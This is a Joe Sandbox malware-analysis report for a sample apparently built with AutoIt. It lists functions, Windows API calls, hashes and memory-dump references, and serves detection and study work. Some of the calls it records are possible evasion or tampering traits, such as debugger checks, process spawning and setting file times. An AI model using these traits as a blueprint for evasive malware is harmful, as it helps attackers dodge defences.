Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: bd9db73afdb499b1ed8dafd67c2560c47e702459b18535a9f98ad8d4a1fa884b
Instruction ID: 2511908842c85af534c88c81f58b522beae7aff185800d0e7c77b27feaf49e66
Opcode Fuzzy Hash: bd9db73afdb499b1ed8dafd67c2560c47e702459b18535a9f98ad8d4a1fa884b
Instruction Fuzzy Hash: DD21F5719047849FFB32CB648856FEABBECAB15314F04009DE7CE96141C3792985EB41

Function 00F97285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FCEA39
GetOpenFileNameW.COMDLG32(?), ref: 00FCEA83

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

Part of subcall function 00FB0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB07B0

Strings

X, xrefs: 00FCEA51

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 94aee356411d6474eedf32d4ba6344a76e517dce86cc5e5d5191e4ed8b6c7a63
Instruction ID: 5bd7c04296f2f3bdb81f15a90f45a44941d9252b0d2becd18e6a249b4593d015
Opcode Fuzzy Hash: 94aee356411d6474eedf32d4ba6344a76e517dce86cc5e5d5191e4ed8b6c7a63
Instruction Fuzzy Hash: 6B21A171A103489BDF51AFD4CC45BEE7BF8AF49314F00801AE448A7241DBB85989AFA1

Function 00FF8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FF8DAC
__fread_nolock.LIBCMT ref: 00FF8DC1

Strings

EA06, xrefs: 00FF8DF3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: c92183bc55c790f4d02fa6c5d57f95cf98a252f13850f1d6849c2e675c97f93c
Instruction ID: 6be54291a4d0af2057dea7f9d454df1e4957fd3aafbada753154ed27e0de8b00
Opcode Fuzzy Hash: c92183bc55c790f4d02fa6c5d57f95cf98a252f13850f1d6849c2e675c97f93c
Instruction Fuzzy Hash: 8501D672C042186EDB28CAA9CC56EFE7BF89F15711F00459EE552D2181E978E6049B60

Function 00CC7C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00CC7C45
ExitProcess.KERNEL32(00000000), ref: 00CC7C64

Strings

D, xrefs: 00CC7C11

Memory Dump Source

Source File: 00000000.00000002.1454627695.0000000000CC6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CC6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc6000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction ID: f082d34e65c1a628222048b20bfe0863145359fda986857aefc6e46f85d8762f
Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
Instruction Fuzzy Hash: 5AF0FFB154424DABDB60DFE0CC49FEE777CFF04701F148508FB1A9A184DA7496089B61

Function 00FF98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00FF98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FF990F

Strings

aut, xrefs: 00FF9909

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: abc480bcfc0653734e4116c1073d376ec099269e2a12cca4bfc7e46e7f124f85
Instruction ID: 1159e0b9ac6e846b99e3780720623a401ecf6ed9b952a69c6c64a13d61af94e8
Opcode Fuzzy Hash: abc480bcfc0653734e4116c1073d376ec099269e2a12cca4bfc7e46e7f124f85
Instruction Fuzzy Hash: 8DD05E7954030EABDB609AA0EC4EFDA777CE704700F0046A1FA9496091EAB995988B91

Function 0100CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0289b4ca4eacc4bfb579d56106e943fbca1c80a6849dff8d58e698bf7b133b05
Instruction ID: 4632962c36cadbf5977ce977757a591fedaf20f5a422c9613bc87550c91e93cb
Opcode Fuzzy Hash: 0289b4ca4eacc4bfb579d56106e943fbca1c80a6849dff8d58e698bf7b133b05
Instruction Fuzzy Hash: 83F16C706083059FEB15DF28C980A6ABBE5FF88314F14895EF8999B391D734E945CF82

Function 00F9F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB0193
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB019B
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB01A6
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB01B1
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB01B9
Part of subcall function 00FB0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB01C1

Part of subcall function 00FA60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F9F930), ref: 00FA6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F9F9CD
OleInitialize.OLE32(00000000), ref: 00F9FA4A
CloseHandle.KERNEL32(00000000), ref: 00FD45C8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 08647eae140e444cf2946d872038eb3d5b4c249f0f4a0ec1edf429b6a99f4a7c
Instruction ID: 27ee375ee42b3468337c664538f76cab12629ff52d090167e41611c01c4bfd19
Opcode Fuzzy Hash: 08647eae140e444cf2946d872038eb3d5b4c249f0f4a0ec1edf429b6a99f4a7c
Instruction Fuzzy Hash: FF81CDB0A11744CFC7A4EF29EC4562B7FE5FB8830AB50812AD489CB25AEB7E5404CF11

Function 00F9434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F94370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F94415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F94432

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: ebd0363ad18f6f6c01ea287a87e3b4975a96e5b4bde307d980fcf7f9f0993d44
Instruction ID: d891b20c10d2e8bef2a625a7b7d7ab96e66ef48df33cd5f59cd4b5443b9d2f70
Opcode Fuzzy Hash: ebd0363ad18f6f6c01ea287a87e3b4975a96e5b4bde307d980fcf7f9f0993d44
Instruction Fuzzy Hash: 073181709047019FEB31DF34D884A9BBBF8FB59318F00092EF6DA82241D775A945DB52

Function 00FB571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00FB5733

Part of subcall function 00FBA16B: __NMSG_WRITE.LIBCMT ref: 00FBA192
Part of subcall function 00FBA16B: __NMSG_WRITE.LIBCMT ref: 00FBA19C

__NMSG_WRITE.LIBCMT ref: 00FB573A

Part of subcall function 00FBA1C8: GetModuleFileNameW.KERNEL32(00000000,010533BA,00000104,?,00000001,00000000), ref: 00FBA25A
Part of subcall function 00FBA1C8: ___crtMessageBoxW.LIBCMT ref: 00FBA308

Part of subcall function 00FB309F: ___crtCorExitProcess.LIBCMT ref: 00FB30A5
Part of subcall function 00FB309F: ExitProcess.KERNEL32 ref: 00FB30AE

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,00000000,?,?,?,00FB0DD3,?), ref: 00FB575F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: bb4a472b2dbc180b5e038051683934c6dbd8bb9d767e100a294467e864b51d48
Instruction ID: ecbf28fb3e25fd922761901568be7866bf2201ab5298ed16cd124a30ac710ebf
Opcode Fuzzy Hash: bb4a472b2dbc180b5e038051683934c6dbd8bb9d767e100a294467e864b51d48
Instruction Fuzzy Hash: 5F01D635740B0ADAD7103A7BEC42BEE77889B82BB1F200525F5059A181DE7D8801BF60

Function 00FF98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FF9548,?,?,?,?,?,00000004), ref: 00FF98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FF9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FF98D1
CloseHandle.KERNEL32(00000000,?,00FF9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FF98D8

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 50ef976ee2de616d5d275d31c65966be25bb40a3f01be302bade492d73ebc48e
Instruction ID: 31b9c9463c66e37a6cb373946c0159d2ebda18a67984cf9f009c8d3992661684
Opcode Fuzzy Hash: 50ef976ee2de616d5d275d31c65966be25bb40a3f01be302bade492d73ebc48e
Instruction Fuzzy Hash: 2EE08632180619B7D7311A94EC09FDA7B19AB06770F108210FB54690E0C7BA15159798

Function 00FF8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00FF8D1B

Part of subcall function 00FB2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FB9A24), ref: 00FB2D69
Part of subcall function 00FB2D55: GetLastError.KERNEL32(00000000,?,00FB9A24), ref: 00FB2D7B

_free.LIBCMT ref: 00FF8D2C
_free.LIBCMT ref: 00FF8D3E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e572bb3280820806cd63a499e0b551fb9ad7511d2bd2374f1c7be07920dd6c79
Instruction ID: afe4f02ecc32b845c377da47348d9996064709689d2a9572e4ffe6a1bf5cd3bc
Opcode Fuzzy Hash: e572bb3280820806cd63a499e0b551fb9ad7511d2bd2374f1c7be07920dd6c79
Instruction Fuzzy Hash: A8E012A1A1160546CB64A579AD40AEB63DC4F5C3A2714091DB90DD7196CE68F843A524

Function 00F9A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00FCFC01

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: f6c4bb3b980a92b6f8fa010f888ee50655d3cc35c11a7ce8a7ee6d850e2f1b70
Instruction ID: c3680b3f8c4e683385e6975458650e9d61ae176208d44f4a02ec4daefea16cfe
Opcode Fuzzy Hash: f6c4bb3b980a92b6f8fa010f888ee50655d3cc35c11a7ce8a7ee6d850e2f1b70
Instruction Fuzzy Hash: 6D226871908301CFEB24DF14C490B6ABBE1BF85314F19895DE89A8B361DB35EC45EB82

Function 00F94C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F94CBA

Strings

EA06, xrefs: 00FCD8CC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 56e4cff5fa353deb3c026ff7f332b3bc348bd30d1c1cff35742bc9f86f0be1e4
Instruction ID: 9dfc3d122bfdfc876b7b2c0be161e84b31b2c3ecdb3bd0e47f7f83dac428105f
Opcode Fuzzy Hash: 56e4cff5fa353deb3c026ff7f332b3bc348bd30d1c1cff35742bc9f86f0be1e4
Instruction Fuzzy Hash: E8419C36E041585BFF269B548C51FBF7BA29F25310F284476EC82DB282D624BD46B3A1

Function 00F97A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F97AAB
_memmove.LIBCMT ref: 00F97B16

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8787708196ce45b0a8645caae1a99237cce191730ca2271c137f8889e79cc621
Instruction ID: 019ff90dde9ffecada3605983855855f0aa6d6924971203d5c455676c2172c26
Opcode Fuzzy Hash: 8787708196ce45b0a8645caae1a99237cce191730ca2271c137f8889e79cc621
Instruction Fuzzy Hash: 8031A4B2714706AFDB04EF68C8D1E69B3A9FF483207158629E519CB291EB34E910DB90

Function 00F947D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F94834

Part of subcall function 00FB336C: __lock.LIBCMT ref: 00FB3372
Part of subcall function 00FB336C: DecodePointer.KERNEL32(00000001,?,00F94849,00FE7C74), ref: 00FB337E
Part of subcall function 00FB336C: EncodePointer.KERNEL32(?,?,00F94849,00FE7C74), ref: 00FB3389

Part of subcall function 00F948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F94915
Part of subcall function 00F948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F9492A

Part of subcall function 00F93B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F93B68
Part of subcall function 00F93B3A: IsDebuggerPresent.KERNEL32 ref: 00F93B7A
Part of subcall function 00F93B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010552F8,010552E0,?,?), ref: 00F93BEB
Part of subcall function 00F93B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00F93C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F94874

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 94edcc0d5a5ee3e84c50ce412e861928382455acefde49d197355449d1a9a565
Instruction ID: e65478de1e39bc15bbe45d8bf0e75928e507973df03c9b2143eaf2c95b7902d2
Opcode Fuzzy Hash: 94edcc0d5a5ee3e84c50ce412e861928382455acefde49d197355449d1a9a565
Instruction Fuzzy Hash: E8119D719183419BDB20EF29DC0590BBFE8FF99750F50451EF084832A1DBBA9549DB92

Function 00FB0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FB571C: __FF_MSGBANNER.LIBCMT ref: 00FB5733
Part of subcall function 00FB571C: __NMSG_WRITE.LIBCMT ref: 00FB573A
Part of subcall function 00FB571C: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,00000000,?,?,?,00FB0DD3,?), ref: 00FB575F

std::exception::exception.LIBCMT ref: 00FB0DEC
__CxxThrowException@8.LIBCMT ref: 00FB0E01

Part of subcall function 00FB859B: RaiseException.KERNEL32(?,?,?,01049E78,00000000,?,?,?,?,00FB0E06,?,01049E78,?,00000001), ref: 00FB85F0

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b04e1948d6128ba2ae9b90c3fef4bbefb6d4b4cf125ddab4d1579bfc3ab37a86
Instruction ID: 9f71618f16fb4bb60447a1611e29bae4e790e1d06409fbaee8a92c9fa14cfc0d
Opcode Fuzzy Hash: b04e1948d6128ba2ae9b90c3fef4bbefb6d4b4cf125ddab4d1579bfc3ab37a86
Instruction Fuzzy Hash: 8FF0C83190031EA6CB24FAD7EC05ADF77AC9F05361F500469FD4496581DF74DA81EAD1

Function 00FB55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB562C
__lock_file.LIBCMT ref: 00FB564D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: dc3e7d03e054663b00b4f0becfab1b1d7646c0d7230214d973e895edd065bf25
Instruction ID: ae80c95752e1f248c29056f36f070a8929092c0d35304788f640fc5c0435959c
Opcode Fuzzy Hash: dc3e7d03e054663b00b4f0becfab1b1d7646c0d7230214d973e895edd065bf25
Instruction Fuzzy Hash: 1E018471C00608EBCF22BF6B9C026DE7B62AF91B61F544115B8145B151DB3D8A52FF91

Function 00FB53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

__lock_file.LIBCMT ref: 00FB53EB

Part of subcall function 00FB6C11: __lock.LIBCMT ref: 00FB6C34

__fclose_nolock.LIBCMT ref: 00FB53F6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e54cd29fb37ac70eea732d51374d90da582ce3cddee2e9ecf68c6d057c22c313
